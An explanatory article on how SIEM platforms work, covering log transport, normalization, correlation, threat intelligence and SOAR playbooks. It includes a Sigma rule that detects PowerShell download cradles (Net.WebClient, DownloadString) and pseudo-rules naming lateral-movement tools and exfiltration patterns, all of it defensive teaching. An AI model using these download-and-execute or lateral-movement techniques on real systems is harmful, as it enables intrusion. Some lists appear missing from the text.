How SIEM Works: Security Information and Event Management

SIEM (Security Information and Event Management) is a centralized platform that collects, normalizes, correlates, and analyzes security event data from across an organization's entire IT infrastructure -- firewalls, IDS/IPS sensors, servers, endpoints, applications, cloud services, identity providers, and network devices. A SIEM transforms millions of individual log entries and alerts into actionable intelligence by correlating events across sources and time, detecting patterns that no single data source could reveal on its own.

The term SIEM was coined by Gartner in 2005, combining two earlier concepts: SIM (Security Information Management, focused on log collection and retention) and SEM (Security Event Management, focused on real-time analysis and alerting). Modern SIEMs have evolved far beyond simple log aggregation. They incorporate user and entity behavior analytics (UEBA), threat intelligence integration, automated response playbooks (SOAR), and increasingly, cloud-native architectures that can process petabytes of security telemetry.

This article covers the core architecture of SIEM systems: how logs are collected and normalized, how correlation rules detect threats, how threat intelligence enriches detections, how SOAR automates response, and the practical considerations of deploying and operating a SIEM at scale.

The Problem SIEM Solves

A mid-sized organization might generate security events from dozens of sources:

Without a SIEM, a security analyst would need to log into each of these systems individually, manually correlate timestamps and IP addresses across different log formats, and somehow identify the needle-in-a-haystack pattern that indicates a real attack among millions of benign events. A SIEM automates this process.

Architecture Overview

SIEM Architecture Log Sources Firewalls IDS/IPS Endpoints (EDR) DNS / DHCP Cloud (AWS/GCP) Auth (AD/LDAP) Collection Syslog receiver API pollers Agent forwarders Normalization Parse → common schema (ECS/CIM) Storage Hot: SSD index (30-90 days) Warm: HDD (6-12 months) Cold: object store (1-7 years) Detection & Correlation Correlation rules Sigma/YARA detection Threat intel matching UEBA (behavioral) Statistical anomaly Threshold alerts Scheduled queries ML models Response & Action Dashboard Alert/Ticket SOAR Playbook Auto-Block Forensic Report Threat Intelligence Feeds IOCs, IP reputation, malware hashes Typical volume: 10K - 500K+ EPS

Log Collection and Transport

The first challenge in building a SIEM is getting log data from source systems to the SIEM platform. There are several transport mechanisms, each with different trade-offs:

Syslog (RFC 5424)

The oldest and most universal log transport protocol. Originally defined as UDP on port 514 (RFC 3164), modern syslog uses TCP with TLS encryption (RFC 5425) for reliable, secure transport. Nearly every network device, Linux server, and security appliance can export logs via syslog.

Syslog messages have a standardized header containing priority (facility + severity), timestamp, hostname, and application name, followed by the message body. The message body format, however, is vendor-specific -- a Cisco ASA firewall, a Palo Alto NGFW, and a Linux auditd daemon all produce wildly different syslog message formats that must be parsed individually.

<134>1 2025-03-15T14:22:33.042Z fw-border-01 ASA 12345 - - %ASA-6-302013: Built inbound TCP connection 4521032 for outside:198.51.100.42/54321 (198.51.100.42/54321) to inside:10.0.1.50/443 (203.0.113.10/443)

Agent-Based Collection

Lightweight agents installed on endpoints forward logs to the SIEM. Common agents include:

Agents provide advantages over raw syslog: reliable delivery with buffering and retry, structured parsing at the source, encryption in transit, and the ability to collect data types that syslog cannot transport (binary files, Windows Event Log entries, container logs).

API-Based Collection

Cloud services and SaaS applications typically expose logs through REST APIs rather than syslog. The SIEM polls these APIs on a schedule (or receives webhooks) to ingest cloud security data:

Log Normalization and Enrichment

Raw logs from different sources use different field names, formats, timestamps, and conventions. A firewall might log source IPs as src, source_address, or SrcAddr. Timestamps might be Unix epochs, ISO 8601, or vendor-specific formats. Without normalization, writing correlation rules that span multiple data sources would require listing every possible field name variation.

Normalization maps raw log fields to a common schema. The two most widely used schemas are:

Enrichment adds context to normalized events:

Correlation Rules

Correlation rules are the intelligence of a SIEM. They define patterns of events across multiple sources and time windows that indicate security threats. A well-designed correlation rule transforms millions of individual log entries into a handful of high-confidence alerts.

Rule Types

Sigma Rules: Vendor-Neutral Detection

Sigma is an open-source, vendor-neutral detection rule format for SIEM systems. Sigma rules are written in YAML and can be automatically converted to the query language of any supported SIEM (Splunk SPL, Elastic KQL, QRadar AQL, Microsoft Sentinel KQL, etc.). This allows the security community to share detection logic without being locked into a specific SIEM vendor.

A Sigma rule detecting suspicious PowerShell execution:

title: Suspicious PowerShell Download Cradle
id: a3f9c5d7-b298-4c13-b4c6-d8f94e39a1b7
status: production
description: Detects PowerShell commands commonly used to download and execute malicious payloads
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\powershell.exe'
    CommandLine|contains|all:
      - 'Net.WebClient'
      - 'DownloadString'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1105

The community maintains thousands of Sigma rules covering MITRE ATT&CK techniques, organized by tactic and platform. Sigma has become the de facto standard for sharing SIEM detection content.

Example Correlation Scenarios

Credential Stuffing Detection:

-- Pseudo-rule: multiple accounts failing auth from one IP
WHEN count(failed_auth events
  WHERE source.ip = X
  AND event.outcome = "failure"
  GROUP BY source.ip
  WITHIN 10 minutes) > 50
AND distinct_count(user.name) > 10
THEN alert "Credential Stuffing" severity HIGH

Lateral Movement Detection:

-- Sequence: compromised host scanning then connecting internally
WHEN event_A = (IDS alert "Network Scan" from host X)
FOLLOWED BY event_B = (
  auth_success from host X to host Y
  WHERE X != Y
  AND both are in $HOME_NET
  WITHIN 30 minutes of event_A
)
FOLLOWED BY event_C = (
  process_creation on host Y
  WHERE process.name in ("psexec.exe", "wmic.exe", "cmd.exe")
  WITHIN 15 minutes of event_B
)
THEN alert "Probable Lateral Movement" severity CRITICAL

Data Exfiltration Detection:

-- Aggregation: unusual outbound data volume
WHEN sum(network.bytes_out
  WHERE source.ip IN $INTERNAL_SERVERS
  AND destination.ip NOT IN $KNOWN_BACKUP_DESTINATIONS
  GROUP BY source.ip
  WITHIN 1 hour) > 5GB
AND time_of_day NOT IN (scheduled_backup_window)
THEN alert "Possible Data Exfiltration" severity HIGH

Threat Intelligence Integration

Threat intelligence feeds provide lists of known-malicious indicators of compromise (IOCs) that the SIEM matches against incoming events in real time. IOC types include:

Threat intelligence is consumed via standardized protocols:

Common threat intelligence sources include commercial feeds (Recorded Future, CrowdStrike, Mandiant), open-source feeds (Abuse.ch, AlienVault OTX, PhishTank), and industry-specific sharing communities (FS-ISAC for financial services, H-ISAC for healthcare).

SOAR: Security Orchestration, Automation, and Response

SOAR extends the SIEM from detection to response. While a SIEM tells you "something bad is happening," SOAR defines what to do about it through automated playbooks. Modern SIEMs increasingly integrate SOAR capabilities natively (Splunk SOAR, Microsoft Sentinel Playbooks, Elastic Security response actions).

Playbook Architecture

A SOAR playbook is a sequence of automated actions triggered by a SIEM alert. Playbooks typically follow a pattern:

  1. Triage -- enrich the alert with additional context (query threat intel, look up asset criticality, check recent login history for the affected user).
  2. Evaluate -- apply logic to determine if the alert is a true positive or likely false positive. If the affected asset is a honeypot, escalate immediately. If the source IP is a known scanner, lower severity.
  3. Contain -- take automated containment actions: block the malicious IP on the firewall, isolate the affected endpoint from the network, disable the compromised user account, quarantine a malicious email across all mailboxes.
  4. Notify -- create a ticket in the incident management system, send Slack/PagerDuty notifications to the on-call analyst, escalate to the incident response team if severity warrants it.
  5. Document -- record all actions taken, evidence collected, and timeline in a case management system for post-incident review.

Example playbook -- phishing email detected:

  1. SIEM alert: email gateway detected a phishing email delivered to a user.
  2. SOAR queries the email gateway API to retrieve the full email (headers, body, attachments, URLs).
  3. SOAR detonates any attachments in a sandbox and checks URLs against threat intelligence.
  4. If confirmed malicious: SOAR searches for the same email across all mailboxes and quarantines all instances.
  5. SOAR checks if the user clicked any URLs in the email (via web proxy logs).
  6. If clicked: SOAR isolates the user's endpoint, resets their password, revokes active sessions, and creates a high-severity incident.
  7. If not clicked: SOAR creates a low-severity ticket for analyst review and sends the user a phishing awareness notification.

Storage and Retention

SIEM storage is one of the largest operational costs. A mid-sized organization ingesting 50,000 events per second generates approximately 4 TB of raw log data per day. Regulatory requirements often mandate retaining this data for 1-7 years, leading to petabyte-scale storage challenges.

Modern SIEMs use tiered storage architectures:

Strategies for managing SIEM storage costs include:

SIEM Deployment Architectures

On-Premises SIEM

Traditional SIEMs run entirely on-premises: dedicated hardware for log collection, indexing, storage, and the correlation engine. Splunk Enterprise, IBM QRadar, and the Elastic Stack (self-managed) are common on-premises deployments. Advantages include full data sovereignty and control over infrastructure. Disadvantages include significant capital expenditure, operational overhead, and scalability limitations.

Cloud-Native SIEM

Cloud-native SIEMs run as managed services in the cloud: Microsoft Sentinel (on Azure), Google Chronicle (on Google Cloud), Splunk Cloud, and Elastic Cloud. These platforms offer elastic scalability, reduced operational overhead, and consumption-based pricing. They are particularly well-suited for organizations with significant cloud infrastructure, as log collection from cloud services is often native and zero-configuration.

Hybrid SIEM

Many organizations adopt a hybrid approach: cloud SIEM for cloud workloads, with on-premises log collectors forwarding data from legacy infrastructure. This addresses data sovereignty concerns (keeping certain logs on-premises) while leveraging cloud scalability for storage and analysis.

Measuring SIEM Effectiveness

A SIEM is only as good as its detection coverage, alert quality, and response speed. Key metrics include:

Common SIEM Pitfalls

See It in Action

SIEM platforms ingest data from across the global internet infrastructure, including BGP routing events, IDS/IPS alerts, and WAF logs. Many organizations correlate BGP anomalies (route hijacks, route leaks) with SIEM data to detect sophisticated network-layer attacks. Use the god.ad BGP Looking Glass to explore the networks of major SIEM vendors and the infrastructure that generates the security telemetry these platforms analyze:

Every connection, every DNS query, every authentication event traversing the BGP-routed internet generates data that feeds into SIEM platforms worldwide. Look up any AS number or IP address to see the routing paths these events traverse on their way from source to SIEM.

See BGP routing data in real time

Open Looking Glass
More Articles
How TLS/HTTPS Works: Securing the Internet's Traffic
Certificate Transparency: How CT Logs Secure the Web's PKI
How Firewalls Work: Packet Filtering, Stateful Inspection, and Beyond
What is Cross-Site Scripting (XSS)?
What is Cross-Site Request Forgery (CSRF)?
What is Server-Side Request Forgery (SSRF)?